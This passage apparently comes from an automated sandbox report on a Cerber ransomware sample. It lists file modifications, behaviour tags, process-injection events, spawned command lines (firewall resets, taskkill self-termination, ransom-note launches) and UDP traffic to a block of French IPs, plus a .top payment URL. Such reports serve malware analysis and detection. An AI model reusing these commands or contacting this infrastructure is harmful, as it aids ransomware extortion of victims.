File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0b431711740db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9C72C381-AC0A-11EF-AE85-F245C6AC432F} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000d060cc5a75ff8e96d7ffe46ae7ad8aa496a4566dda2e9f7675121c9a0f3b0bfd000000000e80000000020000200000001548255d7085fcce04efe2b9cc19f366b9ad3a8ff856ea9738fe9af92e444b8c200000005f6aa8de2a98c6e4a02cd0e0fc07827f1a6f2d36a32c614967bff5ea3deaa8ee4000000082c623d513283c930f0ee206a730ab2c813285b452e9ea3ec92b90e9e59c01b08fb4799070ae8f5b775a981fb9ee34d871f6347b0383ea7dbfe54a7945d56217 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc500000000002000000000010660000000100002000000019d4fc9514992a776c998274c75bee5202109a4261307bd0cb1be77268a56d73000000000e8000000002000020000000df581443db6dbd3453e21d5c14be74a60d968689b3d11e3737f6359e1d93d6cf90000000a5031d803b8d8cb7cdcd8cb84f7439f49a70db7858b1bbe76aa915a80d4da15c25ee05c5e6dd5028e6a2b6f979b1102511f7f6350bd81180765694d6c903a0c0978229001aeb0f7203b08a3c3140bf9381ababc37110393110362aa78eea52cf79dc07c878b4ca31a1242073e47fb9cdbd1d85fe8f846300134d0fed9959dd295642feba198895c2d856f2d939eadd64400000007382fef5747b967fbaed37865ab7a96e2debb7a37194fada41791974a25d7a83fa07a6d871d89890441d927aed80e99d73ffe386837d6566b7d15f8a99bfd423 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2856 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2856 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2856 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2856 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2856 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2856 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2856 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2856 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2856 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2856 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2856 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2856 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2856 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2856 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2856 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2856 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2856 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 688 wrote to memory of 1880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 688 wrote to memory of 1880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 688 wrote to memory of 1880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 688 wrote to memory of 1880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 688 wrote to memory of 2316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 688 wrote to memory of 2316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 688 wrote to memory of 2316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 688 wrote to memory of 2316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3012 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 3012 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 3012 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 3012 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2632 wrote to memory of 2392 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2632 wrote to memory of 2392 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2632 wrote to memory of 2392 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2632 wrote to memory of 2392 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2632 wrote to memory of 2364 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2632 wrote to memory of 2364 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2632 wrote to memory of 2364 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2632 wrote to memory of 2364 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\cerber.exe

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___75WVLOZ_.hta"

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___CXIFPVMR_.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "cerber.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://p27dokhpz2n7nvgr.12hygy.top/7A06-6BFE-6C33-0446-9E59

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2632 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2632 CREDAT:1192967 /prefetch:2

Network

Country Destination Domain Proto
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
FR 178.33.160.65:6893 udp
FR 178.33.160.66:6893 udp
FR 178.33.160.67:6893 udp
FR 178.33.160.68:6893 udp
FR 178.33.160.69:6893 udp
FR 178.33.160.70:6893 udp
FR 178.33.160.71:6893 udp
FR 178.33.160.72:6893 udp
FR 178.33.160.73:6893 udp
FR 178.33.160.74:6893 udp
FR 178.33.160.75:6893 udp
FR 178.33.160.76:6893 udp
FR 178.33.160.77:6893 udp
FR 178.33.160.78:6893 udp
FR 178.33.160.79:6893 udp
FR 178.33.160.80:6893 udp
FR 178.33.160.81:6893 udp
FR 178.33.160.82:6893 udp
FR 178.33.160.83:6893 udp
FR 178.33.160.84:6893 udp
FR 178.33.160.85:6893 udp
FR 178.33.160.86:6893 udp
